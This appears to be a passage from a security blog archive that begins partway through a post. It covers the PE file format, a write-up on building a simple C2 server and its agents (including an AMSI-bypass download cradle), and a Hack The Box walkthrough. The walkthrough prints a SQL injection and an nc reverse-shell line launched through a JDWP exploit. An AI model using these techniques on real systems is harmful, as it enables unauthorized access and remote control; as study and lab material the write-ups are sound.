SizeOfStackReserve, SizeOfStackCommit, SizeOfHeapReserve and SizeOfHeapCommit: These fields specify the size of the stack to reserve, the size of the stack to commit, the size of the local heap space to reserve and the size of the local heap space to commit respectively.
LoaderFlags: A reserved field that the documentation says should be set to 0.
NumberOfRvaAndSizes: Size of the DataDirectory array.
DataDirectory: An array of IMAGE_DATA_DIRECTORY structures. We will talk about this in the next post.
Let’s take a look at the Optional Header contents of an actual PE file.
We can talk about some of these fields. The first is the Magic field at the start of the header; it has the value 0x20B, meaning this is a PE32+ executable.
We can see that the entry point RVA is 0x12C4 and the code section start RVA is 0x1000, it follows the alignment defined by the SectionAlignment field which has the value of 0x1000.
File alignment is set to 0x200, and we can verify this by looking at any of the sections, for example the data section:
As you can see, the actual contents of the data section are from 0x2200 to 0x2229, however the rest of the section is padded until 0x23FF to comply with the alignment defined by FileAlignment.
SizeOfImage is set to 0x7000 and SizeOfHeaders is set to 0x400, multiples of SectionAlignment and FileAlignment respectively.
The Subsystem field is set to 3 which is the Windows console, and that makes sense because the program is a console application.
I didn’t include the DataDirectory in the optional header contents screenshot because we still haven’t talked about it yet.
Conclusion
We’ve reached the end of this post. In summary we looked at the NT Headers structure, and we discussed the File Header and Optional Header structures in detail.
In the next post we will take a look at the Data Directories, the Section Headers, and the sections.
Thanks for reading.
A dive into the PE file format - PE file structure - Part 2: DOS Header, DOS Stub and Rich Header
Introduction
In the previous post we looked at a high level overview of the PE file structure, in this post we’re going to talk about the first two parts which are the DOS Header and the DOS Stub.
The PE viewer I’m going to use throughout the series is called PE-bear, it’s full of features and has a good UI.
DOS Header
Overview
The DOS header (also called the MS-DOS header) is a 64-byte-long structure that exists at the start of the PE file.
It's not important for the functionality of PE files on modern Windows systems; however, it's there for backward compatibility reasons.
This header makes the file an MS-DOS executable, so when it’s loaded on MS-DOS the DOS stub gets executed instead of the actual program.
Without this header, if you attempt to load the executable on MS-DOS it will not be loaded and will just produce a generic error.
Structure
As mentioned before, it’s a 64-byte-long structure, we can take a look at the contents of that structure by looking at the IMAGE_DOS_HEADER structure definition from winnt.h:
typedef struct _IMAGE_DOS_HEADER {      // DOS .EXE header
    WORD   e_magic;                     // Magic number
    WORD   e_cblp;                      // Bytes on last page of file
    WORD   e_cp;                        // Pages in file
    WORD   e_crlc;                      // Relocations
    WORD   e_cparhdr;                   // Size of header in paragraphs
    WORD   e_minalloc;                  // Minimum extra paragraphs needed
    WORD   e_maxalloc;                  // Maximum extra paragraphs needed
    WORD   e_ss;                        // Initial (relative) SS value
    WORD   e_sp;                        // Initial SP value
    WORD   e_csum;                      // Checksum
    WORD   e_ip;                        // Initial IP value
    WORD   e_cs;                        // Initial (relative) CS value
    WORD   e_lfarlc;                    // File address of relocation table
    WORD   e_ovno;                      // Overlay number
    WORD   e_res[4];                    // Reserved words
    WORD   e_oemid;                     // OEM identifier (for e_oeminfo)
    WORD   e_oeminfo;                   // OEM information; e_oemid specific
    WORD   e_res2[10];                  // Reserved words
    LONG   e_lfanew;                    // File address of new exe header
} IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;
This structure is important to the PE loader on MS-DOS, however only a few members of it are important to the PE loader on Windows Systems, so we’re not going to cover everything in here, just the important members of the structure.
e_magic: This is the first member of the DOS Header, it’s a WORD so it occupies 2 bytes, it’s usually called the magic number.
It has a fixed value of 0x5A4D or MZ in ASCII, and it serves as a signature that marks the file as an MS-DOS executable.
e_lfanew: This is the last member of the DOS header structure, it’s located at offset 0x3C into the DOS header and it holds an offset to the start of the NT headers.
This member is important to the PE loader on Windows systems because it tells the loader where to look for the file header.
The following picture shows contents of the DOS header in an actual PE file using PE-bear:
As you can see, the first member of the header is the magic number with the fixed value we talked about, 0x5A4D.
The last member of the header (at offset 0x3C) is given the name "File address of new exe header". It has the value 0x100, and if we follow that offset we'll find the start of the NT headers as expected:
DOS Stub
Overview
The DOS stub is an MS-DOS program that prints an error message saying that the executable is not compatible with DOS then exits.
This is what gets executed when the program is loaded in MS-DOS, the default error message is “This program cannot be run in DOS mode.”, however this message can be changed by the user during compile time.
That’s all we need to know about the DOS stub, we don’t really care about it, but let’s take a look at what it’s doing just for fun.
Analysis
To be able to disassemble the machine code of the DOS stub, I copied the code of the stub from PE-bear, then I created a new file with the stub contents using a hex editor (HxD) and gave it the name dos-stub.exe.
Stub code:
0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68
69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F
74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20
6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00
After that I used IDA to disassemble the executable, MS-DOS programs are 16-bit programs, so I chose the intel 8086 processor type and the 16-bit disassembly mode.
It’s a fairly simple program, let’s step through it line by line:
seg000:0000 push cs
seg000:0001 pop ds
The first line pushes the value of cs onto the stack and the second line pops that value off the top of the stack into ds. This is just a way of setting the value of the data segment to the same value as the code segment.
seg000:0002 mov dx, 0Eh
seg000:0005 mov ah, 9
seg000:0007 int 21h ; DOS - PRINT STRING
seg000:0007 ; DS:DX -> string terminated by "$"
These three lines are responsible for printing the error message, first line sets dx to the address of the string “This program cannot be run in DOS mode.” (0xe), second line sets ah to 9 and the last line invokes interrupt 21h.
Interrupt 21h is a DOS interrupt (API call) that can do a lot of things, it takes a parameter that determines what function to execute and that parameter is passed in the ah register.
We see here that the value 9 is given to the interrupt, 9 is the code of the function that prints a string to the screen, that function takes a parameter which is the address of the string to print, that parameter is passed in the dx register as we can see in the code.
Information about the DOS API can be found on wikipedia.
seg000:0009 mov ax, 4C01h
seg000:000C int 21h ; DOS - 2+ - QUIT WITH EXIT CODE (EXIT)
seg000:000C ; AL = exit code
The last three lines of the program are again an interrupt 21h call. This time there's a mov instruction that puts 0x4C01 into ax, which sets al to 0x01 and ah to 0x4C.
0x4c is the function code of the function that exits with an error code, it takes the error code from al, which in this case is 1.
So in summary, all the DOS stub is doing is print the error message then exit with code 1.
Rich Header
So now we’ve seen the DOS Header and the DOS Stub, however there’s still a chunk of data we haven’t talked about lying between the DOS Stub and the start of the NT Headers.
This chunk of data is commonly referred to as the Rich Header, it’s an undocumented structure that’s only present in executables built using the Microsoft Visual Studio toolset.
This structure holds some metadata about the tools used to build the executable like their names or types and their specific versions and build numbers.
None of the PE file format resources I read mentioned this structure, but when searching for the Rich Header itself I found a decent amount of resources, and that makes sense: the Rich Header is not actually part of the PE file format structure and can be completely zeroed out without interfering with the executable's functionality, it's just something Microsoft adds to any executable built using their Visual Studio toolset.
I only know about the Rich Header because I’ve read the reports on the Olympic Destroyer malware, and for those who don’t know what Olympic Destroyer is, it’s a malware that was written and used by a threat group in an attempt to disrupt the 2018 Winter Olympics.
This piece of malware is known for having a lot of false flags that were intentionally put to cause confusion and misattribution, one of the false flags present there was a Rich Header.
The authors of the malware overwrote the original Rich Header in the malware executable with the Rich Header of another malware attributed to the Lazarus threat group to make it look like it was Lazarus.
You can check Kaspersky’s report for more information about this.
The Rich Header consists of a chunk of XORed data followed by a signature (Rich) and a 32-bit checksum value that is the XOR key.
The encrypted data starts with a DWORD signature DanS, followed by 3 zeroed-out DWORDs for padding, then pairs of DWORDs, each pair representing an entry; each entry holds a tool name, its build number and the number of times it was used.
In each pair, the first DWORD holds the type ID (or product ID) in its high WORD and the build ID in its low WORD, while the second DWORD holds the use count.
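The decoding process described above can be sketched as follows. This is a simplified parser: it naively searches for the Rich signature and assumes well-formed input, which a robust parser shouldn't do:

```python
import struct

def parse_rich_header(data: bytes):
    """Return a list of (product_id, build_id, use_count) tuples, or None."""
    end = data.find(b"Rich")
    if end == -1:
        return None
    # The DWORD right after "Rich" is the XOR key (the checksum).
    key = struct.unpack_from("<I", data, end + 4)[0]
    # XOR-decode DWORDs backwards until the DanS signature appears.
    dwords = []
    pos = end - 4
    while pos >= 0:
        value = struct.unpack_from("<I", data, pos)[0] ^ key
        dwords.insert(0, value)
        if value == 0x536E6144:  # "DanS" as a little-endian DWORD
            break
        pos -= 4
    entries = []
    # Skip DanS + three zeroed padding DWORDs, then read the entry pairs.
    for i in range(4, len(dwords) - 1, 2):
        comp_id, use_count = dwords[i], dwords[i + 1]
        entries.append((comp_id >> 16, comp_id & 0xFFFF, use_count))
    return entries
```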
PE-bear parses the Rich Header automatically:
As you can see the DanS signature is the first thing in the structure, then there are 3 zeroed-out DWORDs and after that comes the entries.
We can also see the corresponding tools and Visual Studio versions of the product and build IDs.
As an exercise I wrote a script to parse this header myself, it’s a very simple process, all we need to do is to XOR the data, then read the entry pairs and translate them.
Please note that I had to reverse the byte-order because the data was presented in little-endian.
After running the script we can see an output that’s identical to PE-bear’s interpretation, meaning that the script works fine.
Translating these values into the actual tools types and versions is a matter of collecting the values from actual Visual Studio installations.
I checked the source code of bearparser (the parser used in PE-bear) and I found comments mentioning where these values were collected from.
// list from: https://github.com/kirschju/richheader
// list based on: https://github.com/kirschju/richheader + pnx's notes
Conclusion
In this post we talked about the first two parts of the PE file, the DOS header and the DOS stub, we looked at the members of the DOS header structure and we reversed the DOS stub program.
We also looked at the Rich Header, a structure that’s not essentially a part of the PE file format but was worth checking.
The following image summarizes what we’ve talked about in this post:
A dive into the PE file format - PE file structure - Part 1: Overview
Introduction
The aim of this post is to provide a basic introduction to the PE file structure without talking about any details.
PE files
PE stands for Portable Executable, it’s a file format for executables used in Windows operating systems, it’s based on the COFF file format (Common Object File Format).
Not only .exe files are PE files; dynamic link libraries (.dll), kernel modules (.sys), Control Panel applications (.cpl) and many others are also PE files.
A PE file is a data structure that holds information necessary for the OS loader to be able to load that executable into memory and execute it.
Structure Overview
A typical PE file follows the structure outlined in the following figure:
If we open an executable file with PE-bear we’ll see the same thing:
DOS Header
Every PE file starts with a 64-byte-long structure called the DOS header, it's what makes the PE file an MS-DOS executable.
DOS Stub
After the DOS header comes the DOS stub which is a small MS-DOS 2.0 compatible executable that just prints an error message saying “This program cannot be run in DOS mode” when the program is run in DOS mode.
NT Headers
The NT Headers part contains three main parts:
PE signature: A 4-byte signature that identifies the file as a PE file.
File Header: A standard COFF File Header. It holds some information about the PE file.
Optional Header: The most important header of the NT Headers, its name is the Optional Header because some files like object files don’t have it, however it’s required for image files (files like .exe files). This header provides important information to the OS loader.
Section Table
The section table follows the Optional Header immediately, it is an array of Image Section Headers, there’s a section header for every section in the PE file.
Each header contains information about the section it refers to.
Sections
Sections are where the actual contents of the file are stored, these include things like data and resources that the program uses, and also the actual code of the program, there are several sections each one with its own purpose.
Conclusion
In this post we looked at a very basic overview of the PE file structure and talked briefly about the main parts of a PE file.
In the upcoming posts we’ll talk about each one of these parts in much more detail.
This is going to be a series of blog posts covering PE files in depth. It will include a range of different topics, mainly the structure of PE files on disk and the way PE files get mapped and loaded into memory. We'll also discuss applying that knowledge to building proof-of-concepts like PE parsers, packers and loaders, as well as proof-of-concepts for some of the memory injection techniques that require this kind of knowledge, such as PE injection, process hollowing, reflective DLL injection, etc.
Why ?
The more I got into reverse engineering and malware development, the more I found that knowledge of the PE file format is absolutely essential. I already knew the basics about PE files, but I had never learned about them properly.
Lately I have decided to learn about PE files, so the upcoming series of posts is going to be a documentation of what I’ve learned.
These posts are not going to cover anything new, there are a lot of resources that talk about the same thing, also the techniques that are going to be covered later have been known for some time.
The goal is not to present anything new, the goal is to form a better understanding of things that already exist.
Contribution
If you’d like to add anything or if you found a mistake that needs correction feel free to contact me. Contact information can be found in the about page.
It's very common that after successful exploitation an attacker will put an agent that maintains communication with a C2 server on the compromised system, and the reason for that is simple: an agent that provides persistence over long periods and almost all the capabilities an attacker needs for lateral movement and other post-exploitation actions is better than, for example, a reverse shell. There are a lot of free open-source post-exploitation toolsets that provide this kind of capability, like Metasploit, Empire and many others, and even if you only play CTFs it's likely that you have used one of them before.
Long story short, I only had a general idea about how these tools work and I wanted to understand the internals of them, so I decided to try and build one on my own. For the last three weeks, I have been searching and coding, and I came up with a very basic implementation of a c2 server and an agent. In this blog post I’m going to explain the approaches I took to build the different pieces of the tool.
Please keep in mind that some of these approaches might not be the best, and the code might be kind of messy. If you have any suggestions for improvements, feel free to contact me; I'd like to know what better approaches I could take. I'd also like to point out that this is not a tool to be used in real engagements: besides only doing basic actions like executing cmd and powershell, I didn't take into consideration any opsec precautions.
This tool is still a work in progress, I finished the base but I’m still going to add more execution methods and more capabilities to the agent. After adding new features I will keep writing posts similar to this one, so that people with more experience give feedback and suggest improvements, while people with less experience learn.
The server itself is written in python3, I wrote two agents, one in c++ and the other in powershell, listeners are http listeners.
I couldn’t come up with a nice name so I would appreciate suggestions.
Listeners
Basic Info
Listeners are the core functionality of the server because they provide the way of communication between the server and the agents. I decided to use http listeners, and I used flask to create the listener application.
A Listener object is instantiated with a name, a port and an IP address to bind to:
The flask application which provides all the functionality of the listener has 5 routes: /reg, /tasks/<name>, /results/<name>, /download/<name>, /sc/<name>.
/reg
/reg is responsible for handling new agents, it only accepts POST requests and it takes two parameters: name and type. name is for the hostname while type is for the agent’s type.
When it receives a new request it creates a random string of 6 uppercase letters as the new agent’s name (that name can be changed later), then it takes the hostname and the agent’s type from the request parameters. It also saves the remote address of the request which is the IP address of the compromised host.
With this information it creates a new Agent object and saves it to the agents database, and finally it responds with the generated random name so that the agent on the other side knows its name.
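As an illustration, a /reg route along these lines could look like the following sketch; random_name and the agents dict are hypothetical stand-ins for the real helpers and the agents database:

```python
import random
import string

from flask import Flask, request

app = Flask(__name__)
agents = {}  # name -> info; stands in for the agents database

def random_name(length: int = 6) -> str:
    # Random string of uppercase letters used as the agent's name.
    return "".join(random.choices(string.ascii_uppercase, k=length))

@app.route("/reg", methods=["POST"])
def reg():
    name = random_name()
    agents[name] = {
        "hostname": request.form.get("name"),
        "type": request.form.get("type"),
        "remote_addr": request.remote_addr,  # IP of the compromised host
    }
    return name  # the agent learns its assigned name from the response
```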
/tasks/<name>
/tasks/<name> is the endpoint that agents request to download their tasks. <name> is a placeholder for the agent's name, and the endpoint only accepts GET requests.
It simply checks if there are new tasks (by checking if the tasks file exists), if there are new tasks it responds with the tasks, otherwise it sends an empty response (204).
/results/<name>
/results/<name> is the endpoint that agents request to send results. <name> is a placeholder for the agent's name; the endpoint only accepts POST requests and takes one parameter, result, which holds the results.
It takes the results and sends them to a function called displayResults() (more on that function in the agent handler part), then it sends an empty response 204.
/sc/<name>
/sc/<name> is just a wrapper around the /download/<name> endpoint for powershell scripts. It responds with a download cradle prepended with a one-liner to bypass AMSI; the cradle downloads the original script from /download/<name>. <name> is a placeholder for the script name, and the endpoint only accepts GET requests.
It takes the script name, creates a download cradle in the following format:
I had to start listeners in threads. However, flask applications don't provide a reliable way to stop the application once started; the only way is to kill the process, and killing threads isn't easy either. So what I did was create a Process object for the function that starts the application, and a thread that starts that process, which means terminating the process kills the thread and stops the application.
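A minimal sketch of that workaround, with a placeholder run_app() standing in for the function that starts the flask application:

```python
import multiprocessing
import threading
import time

def run_app():
    # Placeholder for app.run(host=..., port=...); loops forever like a server.
    while True:
        time.sleep(1)

class Listener:
    def start(self):
        # The process runs the flask app; the thread only starts the process.
        self.process = multiprocessing.Process(target=run_app)
        self.thread = threading.Thread(target=self.process.start)
        self.thread.start()

    def stop(self):
        # Terminating the process stops the app; the thread has already exited.
        self.thread.join()
        self.process.terminate()
        self.process.join()
```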
As mentioned earlier, I wrote two agents, one in powershell and the other in c++. Before going through the code of each one, let me talk about what agents do.
When an agent is executed on a system, first thing it does is get the hostname of that system then send the registration request to the server (/reg as discussed earlier).
After receiving the response which contains its name it starts an infinite loop in which it keeps checking if there are any new tasks, if there are new tasks it executes them and sends the results back to the server.
After each loop it sleeps for a specified amount of time that’s controlled by the server, the default sleep time is 3 seconds.
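The check-execute-sleep cycle can be modelled in python (the real agents are written in powershell and c++); the three callbacks here are hypothetical stand-ins for the actual transport and execution code:

```python
import time

def agent_loop(get_tasks, execute, send_results, sleep_time=3):
    """get_tasks: GET /tasks/<name> (None on a 204 empty response);
    execute: runs the task; send_results: POST /results/<name>."""
    while True:
        task = get_tasks()
        if task == "quit":
            break
        if task:
            send_results(execute(task))
        time.sleep(sleep_time)
```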
Let’s take a look inside the loop, first thing it does is request new tasks, we know that if there are no new tasks the server will respond with a 204 empty response, so it checks if the response is not null or empty and based on that it decides whether to execute the task execution code block or just sleep again:
If the flag was VALID it will continue, otherwise it will sleep again. This ensures that the data has been decrypted correctly.
if ($flag -eq "VALID") {
After ensuring that the data is valid, it takes the command it’s supposed to execute and the arguments:
$command = $task[1]
$args = $task[2..$task.Length]
There are 5 valid commands: shell, powershell, rename, sleep and quit.
shell executes cmd commands, powershell executes powershell commands, rename changes the agent's name, sleep changes the sleep time, and quit just exits.
Let’s take a look at each one of them. The shell and powershell commands basically rely on the same function called shell, so let’s look at that first:
It starts a new process with the given file name, whether that's cmd.exe or powershell.exe, and passes the given arguments. Then it captures stdout and stderr and returns the result, which is the VALID flag appended with stdout and stderr separated by a newline.
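The same idea expressed in Python, as a hedged sketch of what the powershell shell function does (the VALID flag comes from the post; everything else is illustrative):

```python
import subprocess

VALID = "VALID"

def shell(file_name, args):
    # Start a new process (cmd.exe / powershell.exe in the real agent;
    # any binary works for this sketch), capture stdout and stderr, and
    # return the VALID flag followed by both streams.
    completed = subprocess.run([file_name] + args,
                               capture_output=True, text=True)
    return VALID + "\n" + completed.stdout + completed.stderr
```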
Now back to the shell and powershell commands, both of them call shell() with the corresponding file name, receive the output, encrypt it and send it:
The rename command updates the name variable as well as the tasks and results URIs, then it sends an empty result indicating that it completed the task:
The same logic is applied in the c++ agent so I will skip the unnecessary parts and only talk about the http functions and the shell function.
Sending http requests wasn't as easy as it was in powershell. I used the winhttp library, and with the help of the Microsoft documentation I created two functions, one for sending GET requests and the other for sending POST requests. They're almost identical, so I'll probably merge them into one function later.
The shell function does almost the same thing as the shell function in the other agent; some of the code is taken from Stack Overflow and edited by me:
Then it defines the sleep time, which is 3 seconds by default as discussed. The server needs to keep track of the sleep time to be able to determine whether an agent is dead when removing it; otherwise it would keep waiting for the agent to call back forever:
self.sleept = 3
After that it creates the needed directories and files:
And finally it creates the menu for the agent, but I won’t cover the Menu class in this post because it doesn’t relate to the core functionality of the tool.
self.menu = menu.Menu(self.name)
self.menu.registerCommand("shell", "Execute a shell command.", "<command>")
self.menu.registerCommand("powershell", "Execute a powershell command.", "<command>")
self.menu.registerCommand("sleep", "Change agent's sleep time.", "<time (s)>")
self.menu.registerCommand("clear", "Clear tasks.", "")
self.menu.registerCommand("quit", "Task agent to quit.", "")
self.menu.uCommands()
self.Commands = self.menu.Commands
I won’t talk about the wrapper functions because we only care about the core functions.
The first function is writeTask(), which is quite simple: it takes the task, prepends the VALID flag, then writes it to the tasks path:
As you can see, it only encrypts the task for powershell agents; that's because there's no encryption in the c++ agent (more on that in the encryption part).
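A rough sketch of what writeTask() might look like; the ENCRYPT placeholder and the exact flag/task layout are assumptions on my part:

```python
VALID = "VALID"

def ENCRYPT(data, key):
    # Placeholder for the server's real encryption routine.
    return data

def write_task(tasks_path, task, agent_type, key=None):
    # Prepend the VALID flag, and only encrypt for powershell ("p")
    # agents -- the c++ agent has no encryption.
    data = VALID + " " + task
    if agent_type == "p":
        data = ENCRYPT(data, key)
    with open(tasks_path, "w") as f:
        f.write(data)
```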
The second function I want to talk about is clearTasks(), which just deletes the tasks file, very simple:
The third function is a very important one called update(). It gets called when an agent is renamed, and it updates the paths. As seen earlier, the paths depend on the agent's name, so without calling this function the agent wouldn't be able to download its tasks.
The remaining functions are either wrappers that rely on these core functions, or helpers that rely on the wrappers. One example is the shell function, which just takes the command and writes the task:
The last function I want to talk about is a helper called displayResults, which takes the sent results and the agent name. If the agent is a powershell agent, it decrypts the results, checks their validity and prints them; otherwise it just prints the results:
def displayResults(name, result):
    if isValidAgent(name, 0) == True:
        if result == "":
            success("Agent {} completed task.".format(name))
        else:
            key = agents[name].key
            if agents[name].Type == "p":
                try:
                    plaintext = DECRYPT(result, key)
                except:
                    return 0
                if plaintext[:5] == "VALID":
                    success("Agent {} returned results:".format(name))
                    print(plaintext[6:])
                else:
                    return 0
            else:
                success("Agent {} returned results:".format(name))
                print(result)
Payloads Generator
Any c2 server should be able to generate payloads for active listeners. As seen earlier in the agents part, we only need to change the IP address, port and key in the agent template, or just the IP address and port in the case of the c++ agent.
PowerShell
Doing this with the powershell agent is simple because a powershell script is just a text file, so we only need to replace the strings REPLACE_IP, REPLACE_PORT and REPLACE_KEY.
The powershell function takes a listener name, and an output name. It grabs the needed options from the listener then it replaces the needed strings in the powershell template and saves the new file in two places, /tmp/ and the files path for the listener. After doing that it generates a download cradle that requests /sc/ (the endpoint discussed in the listeners part).
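The string replacement itself is trivial; a sketch (the placeholder names come from the post, the template text here is invented for illustration):

```python
def fill_template(template, ip, port, key):
    # Swap the placeholder strings for the listener's real options.
    return (template
            .replace("REPLACE_IP", ip)
            .replace("REPLACE_PORT", str(port))
            .replace("REPLACE_KEY", key))
```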
Generating the c++ payload wasn't as easy as the powershell one, because the c++ agent is a compiled PE executable.
It was a huge problem and I spent a lot of time trying to figure out what to do, that was when I was introduced to the idea of a stub.
The idea is to append whatever data needs to be dynamically assigned to the end of the executable, and to design the program so that it reads its own file and pulls out the appended information.
In the source of the agent I added a few lines of code that do the following:
The winexe function takes a listener name, an architecture and an output name; it grabs the needed options from the listener, appends them to the template corresponding to the selected architecture, and saves the new file in /tmp:
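The stub trick can be sketched like this; the marker bytes and config format are hypothetical, and the "PE" here is obviously just a few fake bytes:

```python
MARKER = b"||CFG||"  # hypothetical separator; the real agent's format may differ

def append_config(template_bytes, ip, port):
    # Server side: tack the options onto the end of the compiled PE.
    return template_bytes + MARKER + "{}:{}".format(ip, port).encode()

def read_config(own_bytes):
    # Agent side: read your own file, find the marker, parse what follows.
    _, _, cfg = own_bytes.rpartition(MARKER)
    ip, port = cfg.decode().split(":")
    return ip, int(port)
```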
I'm not very good at cryptography, so this part was the hardest of all. At first I wanted to use AES and do a Diffie-Hellman key exchange between the server and the agent. However, I found that powershell can't deal with big integers without the .NET class BigInteger, and because I'm not sure that class is always available, I gave up on the idea and decided to hardcode the key while generating the payload; I didn't want to risk the compatibility of the agent. I could use AES in powershell easily, but I couldn't do the same in c++, so I decided to use a simple xor. Again there were some issues, which is why the winexe agent won't use any encryption until I figure out what to do.
Let’s take a look at the crypto functions in both the server and the powershell agent.
Server
The AESCipher class uses the AES class from the pycrypto library; it uses AES-256 in CBC mode.
An AESCipher object is instantiated with a key, it expects the key to be base-64 encoded:
The powershell agent uses the .NET class System.Security.Cryptography.AesManaged.
The first function is Create-AesManagedObject, which instantiates an AesManaged object using the given key and IV. It must use the same options we chose on the server side, which are CBC mode, zero padding and a 32-byte key length:
After that it checks whether the provided key and IV are of type String (which means the key or IV is base-64 encoded) and, depending on that, decodes them before using them. Then it returns the AesManaged object.
The Encrypt function takes a key and a plaintext string, converts the string to bytes, then uses Create-AesManagedObject to create the AesManaged object and encrypts the string with a randomly generated IV.
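As a rough illustration of the zero padding both sides have to agree on (a pure-Python sketch, not the actual pycrypto/AesManaged code):

```python
BLOCK = 16  # AES block size in bytes

def zero_pad(data):
    # Pad with zero bytes up to the next block boundary.
    remainder = len(data) % BLOCK
    if remainder == 0:
        return data
    return data + b"\x00" * (BLOCK - remainder)

def zero_unpad(data):
    # Strip trailing zero bytes after decryption. Note this scheme is
    # ambiguous for plaintexts that legitimately end in zero bytes.
    return data.rstrip(b"\x00")
```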
I used pickle to serialize agents and listeners and save them in databases. When you exit the server it saves all of the agent and listener objects; when you start it again it loads those objects, so you don't lose your agents or listeners.
For the listeners, pickle can't serialize objects that use threads, so instead of saving the objects themselves I created a dictionary that holds all the information about the active listeners and serialized that. The server loads that dictionary and restarts the listeners according to the options it contains.
I created wrapper functions that read, write and remove objects from the databases:
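The wrappers could look roughly like this (names and file layout are my own guesses, not the tool's actual code):

```python
import os
import pickle

def write_db(path, obj):
    # Serialize an object (or the listener-options dict) to disk.
    with open(path, "wb") as f:
        pickle.dump(obj, f)

def read_db(path):
    # Load a previously saved object, or None if nothing was saved.
    if not os.path.exists(path):
        return None
    with open(path, "rb") as f:
        return pickle.load(f)

def remove_db(path):
    if os.path.exists(path):
        os.remove(path)
```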
I will show you a quick demo on a Windows Server 2016 target.
This is what the home screen of the server looks like:
Let’s start by creating a listener:
Now let’s create a payload, I created the three available payloads:
After executing the payloads on the target we’ll see that the agents successfully contacted the server:
Let’s rename the agents:
I executed 4 simple commands on each agent:
Then I tasked each agent to quit.
And that concludes this blog post. As I said before, I would appreciate any feedback and suggestions, so feel free to contact me on twitter @Ahm3d_H3sham.
If you liked the article, tweet about it. Thanks for reading.
Hey guys, today AI retired and here's my write-up about it. It's a medium rated Linux box and its IP is 10.10.10.163; I added it to /etc/hosts as ai.htb. Let's jump right in!
Nmap
As always we will start with nmap to scan for open ports and services:
root@kali:~/Desktop/HTB/boxes/AI# nmap -sV -sT -sC -o nmapinitial ai.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-24 17:46 EST
Nmap scan report for ai.htb (10.10.10.163)
Host is up (0.83s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6d:16:f4:32:eb:46:ca:37:04:d2:a5:aa:74:ed:ab:fc (RSA)
| 256 78:29:78:d9:f5:43:d1:cf:a0:03:55:b1:da:9e:51:b6 (ECDSA)
|_ 256 85:2e:7d:66:30:a6:6e:30:04:82:c1:ae:ba:a4:99:bd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Hello AI!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 123.15 seconds
root@kali:~/Desktop/HTB/boxes/AI#
We got ssh on port 22 and http on port 80.
Web Enumeration
The index page was empty:
By hovering over the logo a menu appears:
The only interesting page there was /ai.php. From the description ("Drop your query using wav file.") my first guess was that it's a speech recognition service that processes users' audio input and executes some query based on it. There's also a possibility that this query is a SQL query, but we'll get to that later:
I also found another interesting page with gobuster:
SQL injection –> Alexa’s Credentials –> SSH as Alexa –> User Flag
As I said earlier, we don't know what it means by "query", but it could be a SQL query. When I created another audio file that says it's a test I got a SQL error because of the ' in it's:
The injection was the hardest part of this box because the service didn't process the audio files correctly most of the time, and it took me a long time to get my payloads to work.
First thing I did was to get the database name.
Payload:
one open single quote union select database open parenthesis close parenthesis comment database
The database name was alexa. The next thing I did was enumerate table names; my payload was like the one shown below, and I kept changing the test after from, trying possible and common names.
Payload:
one open single quote union select test from test comment database
The table users existed.
Payload:
one open single quote union select test from users comment database
From here it was easy to guess the column names: username and password. The problem with username was that the service processed user and name as two different words, so I couldn't make it work.
Payload:
one open single quote union select username from users comment database
password worked just fine.
Payload:
one open single quote union select password from users comment database
Without knowing the username we can't do anything with the password. I tried alexa, which was the database name, and it worked:
We owned user.
JDWP –> Code Execution –> Root Shell –> Root Flag
Privilege escalation on this box was very easy. When I checked the running processes I found this one:
This was related to an Apache Tomcat server running on localhost. I looked at that server for about 10 minutes, but it was empty and I couldn't do anything there; it was a rabbit hole. If we check the listening ports we'll see 8080, 8005 and 8009, which is perfectly normal because these are the ports used by tomcat, but we'll also see 8000:
alexa@AI:~$ netstat -ntlp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp6 0 0 127.0.0.1:8080 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 127.0.0.1:8005 :::* LISTEN -
tcp6 0 0 127.0.0.1:8009 :::* LISTEN -
alexa@AI:~$
A quick search on that port and how it relates to tomcat revealed that it's used for debugging: jdwp was running on that port.
The Java Debug Wire Protocol (JDWP) is the protocol used for communication between a debugger and the Java virtual machine (VM) which it debugs (hereafter called the target VM). -docs.oracle.com
By looking at the process again we can also see this parameter given to the java binary:
I searched for exploits for the jdwp service and found this exploit. I uploaded the python script to the box, added my reverse shell payload to a file called pwned.sh, then ran the exploit:
alexa@AI:/dev/shm$ nano pwned.sh
alexa@AI:/dev/shm$ chmod +x pwned.sh
alexa@AI:/dev/shm$ cat pwned.sh
#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.xx.xx 1337 >/tmp/f
alexa@AI:/dev/shm$ python jdwp-shellifier.py -t 127.0.0.1 --cmd /dev/shm/pwned.sh
[+] Targeting '127.0.0.1:8000'
[+] Reading settings for 'OpenJDK 64-Bit Server VM - 11.0.4'
[+] Found Runtime class: id=b8c
[+] Found Runtime.getRuntime(): id=7f40bc03e790
[+] Created break event id=2
[+] Waiting for an event on 'java.net.ServerSocket.accept'
Then from another ssh session I triggered a connection on port 8005:
alexa@AI:~$ nc localhost 8005
And the code was executed:
[+] Received matching event from thread 0x1
[+] Selected payload '/dev/shm/pwned.sh'
[+] Command string object created id:c31
[+] Runtime.getRuntime() returned context id:0xc32
[+] found Runtime.exec(): id=7f40bc03e7c8
[+] Runtime.exec() successful, retId=c33
[!] Command successfully executed
alexa@AI:/dev/shm$
And we owned root!
That's it, feedback is appreciated!
